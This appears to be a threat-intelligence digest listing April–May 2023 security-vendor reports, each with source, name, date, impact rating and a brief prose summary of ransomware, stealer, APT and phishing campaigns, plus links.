- Last year Bitdefender Labs reserchers observed an attack on foreign government institutions in Kazakhstan. During the analyses, it was disovered that this was a highly targeted attack to get an access to exfiltrate data. Bitdefender Labs reserchers did moitored for awhile it and the region for other similar attacks. Recently they detected another attack in Afghanistan and collected additional samples and observations.
—
- Intel Source:
- Abnormal
- Intel Name:
- Taking_a_Closer_Look_at_Israel_Based_BEC_Attacks
- Date of Scan:
- 2023-05-10
- Impact:
- HIGH
- Summary:
- Researchers from Abnormal Security have discovered that an Israel-based threat group has conducted 350 BEC campaigns since February 2021, with email attacks targeting employees from 61 countries across six continents.
—
- Intel Source:
- Cofense
- Intel Name:
- MitM_Phishing_Growing_and_Using_Real_Login_Process_to_Steal_Credentials
- Date of Scan:
- 2023-05-10
- Impact:
- LOW
- Summary:
- Cofense researchers have observed Man-in-the-middle attacks are increasing rapidly and identified a 35% increase in volume reaching inboxes between Q1 2022 and Q1 2023, 94% of MitM credential phishing attacks reaching inboxes targeted O365 authentication, and 89% of campaigns used at least one URL redirect, and 55% used two or more.
Source:
https://cofense.com/blog/cofense-intelligence-strategic-analysis-2/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Royal_Ransomware_Expands_to_Target_Linux_and_VMware_ESXi
- Date of Scan:
- 2023-05-10
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have observed that the Royal ransomware group has recently launched a variant of its encryptor malware built in the form of executable and linkable format (ELF) binary. Also, they started using the BatLoader dropper and SEO poisoning for initial access.
Source:
https://unit42.paloaltonetworks.com/royal-ransomware/
—
- Intel Source:
- Cofense
- Intel Name:
- Microsoft_Phish_Redirects_Victims_to_Catering_Voice_Recording
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- Cofense researchers have observed credential phishing campaigns that use a novel deception technique, luring unsuspecting users into a false sense of security after they’ve given away their Microsoft login information.
—
- Intel Source:
- Fortinet
- Intel Name:
- AndoryuBot_Targeting_Ruckus_Wireless_Admin_Remote_Code_Execution_Vulnerability
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed a unique botnet based on the SOCKS protocol distributed through the Ruckus vulnerability (CVE-2023-25717). It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies.
—
- Intel Source:
- Blackberry
- Intel Name:
- SideWinder_Using_Server_Based_Polymorphism_Technique
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- BlackBerry researchers have observed that APT Group SideWinder is accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.
Source:
https://blogs.blackberry.com/en/2023/05/sidewinder-uses-server-side-polymorphism-to-target-pakistan
—
- Intel Source:
- Quickheal
- Intel Name:
- IRCTC_fake_apps
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- Quickheal analysts went through the recent advisory published by the Indian Railway Catering and Tourism Corporation (IRCTC), about the IRCTC fakeapps. The Fake IRCTC app pretends like it is real IRCTC app but is in reality a full-fledged spyware that spies on victims with ease.
Source:
https://blogs.quickheal.com/beware-fake-applications-are-disguised-as-legitimate-ones/
—
- Intel Source:
- KrebsonSecurity
- Intel Name:
- US_Job_Services_Leaks_Customer_Data
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- Researchers from KrebsonSecurity have identified a huge tranche of full credit card records exposed online, and that at first glance the domain names involved appeared to be affiliated with the United States Postal Service.
—
- Intel Source:
- Fortinet
- Intel Name:
- SideCopy_Group_Delivering_Malware_via_Phishing_Emails
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- FortiGate researchers have identified one file that referenced an Indian state military research organization and an in-development nuclear missile. The file is meant to deploy malware with characteristics matching the APT group SideCopy with activities dating back to at least 2019, this group has aligned its targeting with the goals and objectives of the Pakistani government.
Source:
https://www.fortinet.com/blog/threat-research/clean-rooms-nuclear-missiles-and-sidecopy
—
- Intel Source:
- Cleafy
- Intel Name:
- New_Web_Injection_Toolkit_DrIBAN_Targeting_Italian_Corporate_Banking_Clients
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Cleafy have observed that Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019.
Source:
https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter1
—
- Intel Source:
- ASEC
- Intel Name:
- RecordBreaker_Stealer_Distributed_by_YouTube_Accounts
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- ASEC analyzed and confirmed the distribution of RecordBreaker through a YouTube account and possibly hacked recently. RecordBreaker is a new Infostealer version of Raccoon Stealer. It tries to pretend itself as a software installer and similar to CryptBot, RedLine, and Vidar. AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of RecordBreaker through a YouTube account that is assumed to have been recently hacked.
—
- Intel Source:
- Mcafee
- Intel Name:
- An_Increase_in_SHTML_Phishing_Attacks
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- McAfee researchers have observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or displaying phishing forms locally within the browser to harvest user-sensitive information.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shtml-phishing-attack-with-blurred-image/
—
- Intel Source:
- Cyble
- Intel Name:
- Phishing_Sites_Spreading_RAT_Called_DarkWatchMan
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a phishing website that imitated a renowned Russian website, CryptoPro CSP. TAs is using this website to distribute DarkWatchman malware.
Source:
https://blog.cyble.com/2023/05/05/sophisticated-darkwatchman-rat-spreads-through-phishing-sites/
—
- Intel Source:
- Mcafee
- Intel Name:
- New_MultiStage_Attack_and_Malware_Distribution_of_Amadey
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- McAfee Labs researchers have identified an increase in Wextract.exe samples, that drop a malware payload at multiple stages.
—
- Intel Source:
- CERT-UA
- Intel Name:
- SmokeLoader_and_RoarBAT_Malware_Attacks_Against_Ukraine
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified an ongoing phishing campaign with invoice-themed lures being used to distribute the SmokeLoader malware in the form of a polyglot file.
—
- Intel Source:
- Cyble
- Intel Name:
- New_KEKW_Malware_Variant_Detected_in_PyPI_Packages
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Cyble researchers have uncovered multiple malicious Python .whl (Wheel) files that are found to be distributing a new malware named ‘KEKW’. KEKW malware can steal sensitive information from infected systems, as well as perform clipper activities which can lead to the hijacking of cryptocurrency transactions.
Source:
https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
—
- Intel Source:
- Meta
- Intel Name:
- Multiple_Malware_Targeting_Business_Users
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Researchers from Meta have analyzed the persistent malware campaigns targeting businesses across the internet, including threat indicators to help raise the industry’s collective defenses across the internet.
Source:
https://engineering.fb.com/2023/05/03/security/malware-nodestealer-ducktail/
—
- Intel Source:
- Netscope
- Intel Name:
- The_Analysis_of_CrossLock_Ransomware
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Netskope researchers have identified a new ransomware named CrossLock. It emerged in April 2023, targeting a large digital certifier company in Brazil. This ransomware was written in Go, which has also been adopted by other ransomware groups, including Hive, due to the cross-platform capabilities offered by the language.
Source:
https://www.netskope.com/blog/netskope-threat-coverage-crosslock-ransomware
—
- Intel Source:
- Sophos
- Intel Name:
- DLL_sideloading_Attacks_Gain_New_Air_With_a_Doubled_Dragon_Breath
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Sophos researchers have spotted malicious DLL sideloading activity that builds on the classic sideloading scenario but adds complexity and layers to its execution.
Source:
https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/
—
- Intel Source:
- Lab52
- Intel Name:
- Mustang_Panda_New_Campaign_Against_Australia
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Lab52 researchers have found a zip file named Biography of Senator the Hon Don Farrell.zip. Hon Don Farrell is the current Australian Secretary of State for Trade and Tourism, indicating a targeted campaign against Australia.
Source:
https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Infostealer_Embedded_in_a_Word_Document
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a malicious document which is an embedded object.
Source:
https://isc.sans.edu/diary/Infostealer+Embedded+in+a+Word+Document/29810/
—
- Intel Source:
- Bushidotoken
- Intel Name:
- Raspberry_Robin_USB_malware_campaign
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- Bushidotoken blog shares the technical details about this malware and analyses how it runs, works, the commands it runs, the processes it uses, and in this case how C2 communications look like.
Source:
https://blog.bushidotoken.net/2023/05/raspberry-robin-global-usb-malware.html
—
- Intel Source:
- Sentilone
- Intel Name:
- Kimsuky_New_Global_Campaign
- Date of Scan:
- 2023-05-06
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has observed ongoing attacks from Kimsuky, a North Korean state-sponsored APT that has a long history of targeting organizations across Asia, North America, and Europe. Ongoing campaigns use a new malware component called ReconShark, which is actively delivered to specifically attacked individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros. ReconShark operates as a reconnaissance tool with unique execution instructions and server communication methods. Recent activity has been linked to a broader set of skills are attributed to North Korea.
Source:
https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/
—
- Intel Source:
- Sentilone
- Intel Name:
- The_Second_Variant_of_Atomic_Stealer_macOS_Malware
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- The threat actor, however, has been busy looking for other ways to target macOS users with a different version of Atomic Stealer. In this post, we take a closer look at how Atomic Stealer works and describe a previously unreported second variant. We also provide a comprehensive list of indicators to aid threat hunters and security teams defending macOS endpoints.
—
- Intel Source:
- Cyble
- Intel Name:
- BlackBit_Ransomware
- Date of Scan:
- 2023-05-06
- Impact:
- MEDIUM
- Summary:
- AhnLab shared their analyses about BlackBit ransomware is being distributed in Korea. BlackBit Ransomware is a LokiLocker ransomware variant that based on the RaaS model. The source code of the BlackBit shows the ransomware is a copy of the LokiLocker with some new changes such as icons, name, color scheme. BlackBit ransomware is a sophisticated one with multipleseveral capabilities to establish persistence, defense evasion, and impair recovery.
Source:
https://blog.cyble.com/2023/05/03/blackbit-ransomware-a-threat-from-the-shadows-of-lokilocker/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Vidar_Infostealer_targeted_a_Polish_Healthcare_Industry
- Date of Scan:
- 2023-05-05
- Impact:
- LOW
- Summary:
- EclecticIQ researchers has observed a spearphishing email targeting the healthcare industry in Poland. The spoofed email looked like as real sent from a Polish government entity and contained a infectips Microsoft Excel XLL attachment that can download and execute Vidar Infostealer malware.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Destructive_cyberattack_UAC_0165_on_the_public_sector_of_Ukraine_using_RoarBat
- Date of Scan:
- 2023-05-05
- Impact:
- MEDIUM
- Summary:
- Upon receiving information about interference in the information and communication system (ICS) of one of the state organizations of Ukraine, measures to investigate a cyber attack were initiated. It was found that the performance of electronic computing machines (server equipment, automated user workstations, data storage systems) was impaired as a result of the destructive influence carried out using the appropriate software.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Malware_IcedID_information_stealer_configuration_analyses
- Date of Scan:
- 2023-05-05
- Impact:
- LOW
- Summary:
- Palo Alto researchers shared an example of an IcedID malware (information stealer) configuration, how it was obfuscated and how they extracted it. It was one IcedID binary and how its configurations are encrypted.
Source:
https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing/
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Investigation_of_BRAINSTORM_and_RILIDE
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified BRAINSTORM, a rust-based dropper, which ultimately led to RILIDE, a chromium-based extension first publicly reported by SpiderLabs. After careful investigation identified that the email and cryptocurrency theft ecosystem of RILIDE is larger than reported.
Source:
https://www.mandiant.com/resources/blog/lnk-between-browsers
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Longzhi_is_Back_With_New_Technique
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a new campaign by Earth Longzhi that is targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji. The recent campaign follows months of dormancy, abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard64.sys, to disable security products installed on the hosts via a bring-your-own-vulnerable-driver (BYOVD) attack.
—
- Intel Source:
- Checkpoint
- Intel Name:
- North_Korean_Group_ScarCruft_Deploying_RokRAT_Malware
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- Checkpoint researchers have identified that the North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default.
Source:
https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/
—
- Intel Source:
- ASEC
- Intel Name:
- CoinMiner_Distributing_to_Linux_SSH_Servers
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have been happening with a distinct pattern since 2022, they involve the usage of malware developed with Shell Script Compiler when installing the XMRig, as well as the creation of a backdoor SSH account.
—
- Intel Source:
- Prodaft
- Intel Name:
- Russian_APT_Hacked_Tajikistani_Carrier_to_Spy_on_Government_and_Public_Services
- Date of Scan:
- 2023-05-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Prodaft have observed a Russian espionage group tracked as Nomadic Octopus spying on Tajikistan’s high-ranking government officials, public service infrastructures, and telecoms services, likely by infiltrating a mobile phone carrier.
Source:
https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf
—
- Intel Source:
- SocRadar
- Intel Name:
- Diving_Deep_into_BlackByte_Ransomware
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- Researchers from SOCRadar have analyzed the BlackByte ransomware. It is a Ransomware operation that began targeting corporate victims worldwide in July 2021. The first findings regarding the group emerged after victims sought help decrypting their files.
Source:
https://socradar.io/dark-web-profile-blackbyte-ransomware/
—
- Intel Source:
- Cyble
- Intel Name:
- Malware_Families_Leveraging_AresLoader_for_Distribution
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new loader called AresLoader that is used to spread several types of malware families. It is a loader malware written in the C programming language that first emerged in cybercrime forums and Telegram channels in 2022.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Internet_Threats_Are_Impersonating_Common_Industries_via_Phishing_Attacks_Web_Skimmer_Analysis_and_Many_More
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed the internet threat landscape and analyzed malicious URL distribution, geolocation, category analysis, and statistics describing attempted malware attacks. Also, this includes industry sectors being targeted for spoofing in phishing pages, as well as downloaded malware statistics, injected JavaScript malware analysis, and malicious DNS analysis.
Source:
https://unit42.paloaltonetworks.com/internet-threats-late-2022/
—
- Intel Source:
- Elastic
- Intel Name:
- New_LOBSHOT_Malware_Deploying_Via_Google_Ads
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Researchers from Elastic Security Labs have observed one malware family called LOBSHOT. It continues to collect victims while remaining undetected. Also, the infrastructure belongs to TA505, the well-known cybercriminal group associated with Dridex, Locky, and Necurs campaigns.
Source:
https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware
—
- Intel Name:
- ASEC_Weekly_Phishing_Email_analyses_April_9_15th_2023
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15st, 2023 and provide statistical information on each type.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Family_Rapture_is_Similar_to_Paradise
- Date of Scan:
- 2023-05-01
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. The findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.
—
- Intel Source:
- Mitiga
- Intel Name:
- A_malicious_Mitiga_document
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Last January, an attacker uploaded a malicious .docx file to Virus Total. He used several of Mitiga’s publicly available branding elements which included logo, fonts and colors, to lend credibility to the document.
Source:
https://www.mitiga.io/blog/mitiga-advisory-virus-total
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Statistics
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from November 21st, 2022 (Monday) to November 27th (Sunday).
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Overview_of_UNIZA_Ransomware
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered a new ransomware variant called UNIZA. Like other ransomware variants. It uses the Command Prompt (cmd.exe) window to display its ransom message, and interestingly, it does not append the filename of the files it encrypts, making it more difficult to determine which files have been impacted.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-uniza-coverage
—
- Intel Source:
- Trellix
- Intel Name:
- Threat_Actors_Leveraging_SEO_Poisoning
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Trellix researchers have identified that hackers continue to innovate their techniques to infect victims, with SEO poisoning being one of the recent trends.
—
- Intel Source:
- Guardio
- Intel Name:
- The_Unstoppable_Malverposting_Continues
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- In this post Gardio vresearchers shared the huge numbers of IOC detections of Malverposting, and also very detailed analyses of this one campaign using adult-rated click bates delivering sophisticated malware — making it even harder for detection, and too easy to mass propagate.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- An_Ongoing_Magecart_Campaign
- Date of Scan:
- 2023-04-30
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified an ongoing Magecart campaign that is leveraging realistic-looking fake payment screens to capture sensitive data entered by unsuspecting users.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_From_APT28_Group_Distributing_Emails_With_Instructions_on_Updating_OS
- Date of Scan:
- 2023-04-30
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have observed the distribution of emails with subject “Windows Update”, allegedly sent on behalf of system administrators of departments. At the same time, senders’ email addresses created on the @outlook.com public service can be formed using the real name and initials of the employee.
—
- Intel Source:
- Bitdefender
- Intel Name:
- The_BellaCiao_Malware_of_Iran
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- BitDefender researchers have observed the modernization of Charming Kitten’s tactics, techniques, and procedures, including a new, previously unseen malware. This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.
Source:
https://businessinsights.bitdefender.com/unpacking-bellaciao-a-closer-look-at-irans-latest-malware
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_new
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
—
- Intel Source:
- Uptycs
- Intel Name:
- RTM_Locker_Ransomware_as_a_Service_Now_Suits_Linux_Architecture
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Uptycs researchers have discovered a new ransomware binary attributed to the RTM group, a known ransomware-as-a-service (RaaS) provider. This is the first time the group has created a Linux binary. Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware’s leaked source code.
Source:
https://www.uptycs.com/blog/rtm-locker-ransomware-as-a-service-raas-linux
—
- Intel Source:
- Welivesecurity
- Intel Name:
- APT_Group_Panda_Delivering_Malware_via_Software_Updates
- Date of Scan:
- 2023-04-27
- Impact:
- HIGH
- Summary:
- ESET researchers discovered a new campaign by the APT group known as Evasive Panda targeting an international NGO in China with malware delivered through updates of popular Chinese software.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Selling_New_Atomic_macOS_Stealer_on_Telegram
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Cyble Researchers have discovered a Telegram channel advertising a new information-stealing malware called Atomic macOS Stealer (AMOS). The malware is specifically designed to target macOS and can steal sensitive information from the victim’s machine.
Source:
https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/
—
- Intel Source:
- TrendMicro
- Intel Name:
- TrafficStealer_Abusing_Open_Container_APIs
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have discovered a different type of attack, a piece of software that leverages Docker containers to generate money through monetized traffic. Although the piece of software itself appears to be legitimate, it likely has compromised components that result in monitoring as a potentially unwanted application.
—
- Intel Source:
- Aqua
- Intel Name:
- The_Exploiting_of_Kubernetes_RBAC_by_attackers
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Aqua researchers have observed new evidence that attackers are exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) in the wild to create backdoors. The attackers also tried to lunch a DaemonSets to take control and seize resources of the K8s clusters they attack. Aqua analyses suspects that this campaign is actively targeting at least 60 clusters in the wild.
Source:
https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
—
- Intel Source:
- Cyble
- Intel Name:
- PaperCut_actively_exploited_in_the_Wild
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- Earlier this month, PaperCut shared a Security alert stating, they have an evidence that unpatched servers are being exploited in the wild. Russian Hacker Suspected Exploiting the PaperCut Vulnerability. The advisories provided by vendors shared insights into the two CVEs – CVE-2023-27350 (Severity: Critical) & CVE-2023-27351(Severity: High). Cyble researchers shared their details for the same in their post.
Source:
https://blog.cyble.com/2023/04/25/print-management-software-papercut-actively-exploited-in-the-wild/
—
- Intel Source:
- PaloAlto
- Intel Name:
- PingPull_Malware_is_Updated_by_Chinese_Alloy_Taurus
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Unit 42 researchers have identified a new variant of PingPull malware used by Alloy Taurus actors designed to target Linux systems. While following the infrastructure leveraged by the actor for this PingPull variant, we also identified their use of another backdoor we track as Sword2033.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Phishing_Attack_Increasing_in_Singapore_for_Tax_Portal
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified an IRAS phishing website that looks legitimate, this website asks users to input their Singapore Personal Access (Singpass) credentials to access government and private services (such as banking) in Singapore.
Source:
https://isc.sans.edu/diary/Strolling+through+Cyberspace+and+Hunting+for+Phishing+Sites/29780/
—
- Intel Source:
- Zero Day Initiative (ZDI)
- Intel Name:
- New_the_Mirai_botnet_exploit
- Date of Scan:
- 2023-04-26
- Impact:
- MEDIUM
- Summary:
- The Zero Day Initiative threat-hunting team discovered recently new exploit attempts in Eastern Europe showing that the Mirai botnet has updated its version to CVE-2023-1389, known as ZDI-CAN-19557/ZDI-23-451. This malicious activity in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.
—
- Intel Source:
- ASEC
- Intel Name:
- Tonto_Team_Using_Anti_Malware_Related_Files_for_DLL_Side_Loading
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified the Tonto Team threat group is targeting mainly Asian countries and has been distributing Bisonal malware
—
- Intel Source:
- ASEC
- Intel Name:
- RokRAT_Malware_Distributing_Through_LNK_Files
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files.
—
- Intel Source:
- Infoblox
- Intel Name:
- Finding_Decoy_Dog_Toolkit_via_Anomalous_DNS_Traffic
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from Infoblox have identified a new malware toolkit named Decoy Dog, that has been discovered that allows attackers to avoid standard detection techniques and target enterprises. It uses DNS query dribbling and strategic domain aging techniques to bypass security checks.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Repurposing_Package_Name_on_PyPI_to_Push_Malware
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Researchers from Reversing Labs have observed that a malicious package on the Python Package Index (PyPI) named termcolour, a three-stage downloader published in multiple versions.
Source:
https://www.reversinglabs.com/blog/package-names-repurposed-to-push-malware-on-pypi
—
- Intel Source:
- Securelist
- Intel Name:
- The_Analysis_of_Tomiris_Group
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Securelist researchers have continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023 and it is targeting government and diplomatic entities in the CIS.
Source:
https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/
—
- Intel Source:
- Checkpoint
- Intel Name:
- New_Findings_of_Educated_Manticore
- Date of Scan:
- 2023-04-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Checkpoint have revealed new findings of an activity cluster closely related to Phosphorus. It presents a new and improved infection chain leading to the deployment of a new version of PowerLess. This implant is attributed to Phosphorus in the past, an Iran-affiliated threat group operating in the Middle East and North America.
—
- Intel Source:
- Cofense
- Intel Name:
- After_15_Years_release_Open_Source_Gh0st_RAT_still_Haunting_Inboxes
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Cofense Intelligence Unit discovered Gh0st RAT, old open-source RAT, that is targeting a healthcare organization. Gh0st RAT was created by a Chinese hacking group named C. The public release of Gh0st RAT source code made it easy for threat actors to manipulate victims. Their information-stealing capabilities: taking full control of the infected machine, recording keystrokes in real time with offline logging available, accessing live web cam feeds including microphone recording, downloading files remotely, remote shutdown and reboot, disabling user input
Source:
https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/
—
- Intel Source:
- Huntress
- Intel Name:
- Zero_Day_Vulnerabilities_in_PaperCut_Print_Management_Software
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Researchers from Huntress have tracked the exploitation of zero-day vulnerabilities against PaperCut MF/NG which allow for unauthenticated remote code execution due to an authentication bypass.
Source:
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
—
- Intel Source:
- Jamf
- Intel Name:
- BlueNoroff_APT_Group_Targeting_macOS_With_RustBucket_Malware
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Jamf Threat Labs have discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. They track and protect against this malware family under the name ‘RustBucket’ and suspect it to be attributed to a North Korean, state-sponsored threat actor.
Source:
https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_OCX_HARVESTER_Attack_Campaign_Using_Modernized_More_Eggs_Suite
- Date of Scan:
- 2023-04-24
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs researchers have observed a new attack campaign tracked as OCX#HARVESTER. Some of the malicious payloads leveraged as part of the attack campaign observed appear to be related to the More_eggs malicious payloads reported earlier.
—
- Intel Source:
- Symantec
- Intel Name:
- X_Trader_Supply_Chain_Attack_Affecting_Critical_Infrastructure_Organizations_in_US_and_Europe
- Date of Scan:
- 2023-04-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have identified that North Korean-linked operations affected more organizations beyond 3CX, including two critical infrastructure organizations in the energy sector.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain
—
- Intel Source:
- Cyble
- Intel Name:
- The_QakBot_Malware_Continues_to_Evolve
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Cyble Research Intelligence Labs have observed that several malware families, such as AsyncRAT, QuasarRAT, DCRAT, etc., have been found using OneNote attachments as part of their tactics. In February 2023, the well-known malware, Qakbot, started using OneNote attachments in their spam campaigns.
Source:
https://blog.cyble.com/2023/04/21/qakbot-malware-continues-to-morph/
—
- Intel Source:
- TrendMicro
- Intel Name:
- ViperSoftX_Encryption_Updates
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- TrendMicro researchers have observed cryptocurrency and information stealer ViperSoftX evading initial loader detection and making its lure more believable by making the initial package loader via cracks, keygens, activators, and packers non-malicious.
Source:
https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html
—
- Intel Source:
- PaloAlto
- Intel Name:
- Scams_Involving_ChatGPT_Are_on_the_Rise
- Date of Scan:
- 2023-04-22
- Impact:
- LOW
- Summary:
- Unit42 researchers have monitored the newly registered domains and squatting domains related to ChatGPT, as it is one of the fastest-growing consumer applications in history. The dark side of this popularity is that ChatGPT is also attracting the attention of scammers seeking to benefit from using wording and domain names that appear related to the site.
Source:
https://unit42.paloaltonetworks.com/chatgpt-scam-attacks-increasing/
—
